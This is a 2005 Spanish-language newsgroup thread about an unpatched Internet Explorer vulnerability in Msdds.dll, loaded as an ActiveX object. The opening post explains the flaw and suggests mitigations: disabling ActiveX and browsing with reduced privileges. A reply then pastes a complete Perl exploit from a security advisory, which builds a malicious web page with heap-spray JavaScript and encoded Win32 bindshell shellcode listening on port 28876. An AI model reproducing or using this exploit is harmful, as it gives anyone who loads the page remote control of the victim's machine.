[seguridad] Importante agujero de seguridad y solucion sugerida.

18/08/2005 - 19:54 por JM Tella Llop [MVP Windows] | Informe spam
En las paginas de 0'days acaba de salir publicada informacion sobre este
problema:
http://www.frsirt.com/english/advisories/2005/1450

Basicamente consiste en instanciar la msdds.ddl (Microsoft Design Tools
Diagram Surface) como un objeto ActiveX. Esto provoca corupcion de memoria
el cual puede ser explotado por una pagina maliciosa.

No existe parche por el momento.

SOLUCION QUE PROPONGO: No permitir la ejecucion de ActiveX hasta que
Microsoft solucione el problema. Y realizar la navegacion con usuario
limitado o bien bajandose los privilegios ejecutando el IE con el
DropMyRights para que se ejecute con permisos de usuario.
He realizado pruebas con esta solucion con los exploits ya existentes y son
incapaces de causar daño de esta manera.

Jose Manuel Tella Llop
MVP - Windows
jmtella@XXXcompuserve.com (quitar XXX)
http://www.multingles.net/jmt.htm

Este mensaje se proporciona "como está" sin garantías de ninguna clase,
y no otorga ningún derecho.

This posting is provided "AS IS" with no warranties, and confers no
rights.
You assume all risk for your use.
 

Leer las respuestas

#1 slag
18/08/2005 - 20:09 | Informe spam
Ves tella los ActiveX son inseguros...

lee I N S E G U R O S

hasta otra bacalao






Microsoft Internet Explorer "Msdds.dll" Remote Code Execution Exploit
(0day)
Date : 17/08/2005

Advisory : FrSIRT/ADV-2005-1450
Rated as : Critical

Note : the "Msdds.dll" library is installed with Microsoft Office and
Microsoft Visual Studio.

#!/usr/bin/perl
#######################################################
#
# Microsoft Internet Explorer "Msdds.dll" Remote Code Execution
Exploit (0day)
#
# Bindshell on port 28876 - Vulnerability discovered and exploited by
Anonymous
#
# PoC code ripped from Berend-Jan Wever's Internet-Exploiter
#
# Vulnerable : EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F (Msdds.dll)
#
# Tested on : Microsoft Internet Explorer 6 SP2 (Windows XP SP2)
#
# Code usage : perl IE-Msddsdll-0day.pl > mypage.html
#
#######################################################
#
# This program is free software; you can redistribute it and/or modify
it under
# the terms of the GNU General Public License version 2, 1991 as
published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but
WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for
more
# details.
#
# A copy of the GNU General Public License can be found at:
# http://www.gnu.org/licenses/gpl.html
# or you can write to:
# Free Software Foundation, Inc.
# 59 Temple Place - Suite 330
# Boston, MA 02111-1307
# USA.
#
#######################################################

# header
my $header = "<html><body><SCRIPT language=\"javascript\">";

# Win32 bindshell (port 28876) - SkyLined
my $shellcode = "shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb".
"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea".
"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7".
"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b".
"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64".
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c".
"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe".
"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0".
"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050".
"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6".
"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650".
"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa".
"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656".
"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1".
"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353".
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353".
"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe".
"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff".
"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");";

# Memory
my $code = "bigblock = unescape(\"%u0D0D%u0D0D\");".
"headersize = 20;".
"slackspace = headersize+shellcode.length".
"while (bigblock.length<slackspace) bigblock+=bigblock;".
"fillblock = bigblock.substring(0, slackspace);".
"block = bigblock.substring(0, bigblock.length-slackspace);".
"while(block.length+slackspace<0x40000) block block+block+fillblock;".
"memory = new Array();".
"for (i=0;i<700;i++) memory[i] = block + shellcode;".
"</SCRIPT>";

# Msdds.dll
my $clsid = 'EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F';

# footer
my $footer = "<object
classid=\"CLSID:".$clsid."\"></object></body></html>".
"Microsoft Internet Explorer Msdds.dll COM Object Remote Exploit";

# print "Content-Type: text/html;"; # if you are in cgi-bin
print "$header $shellcode $code $footer";

Preguntas similares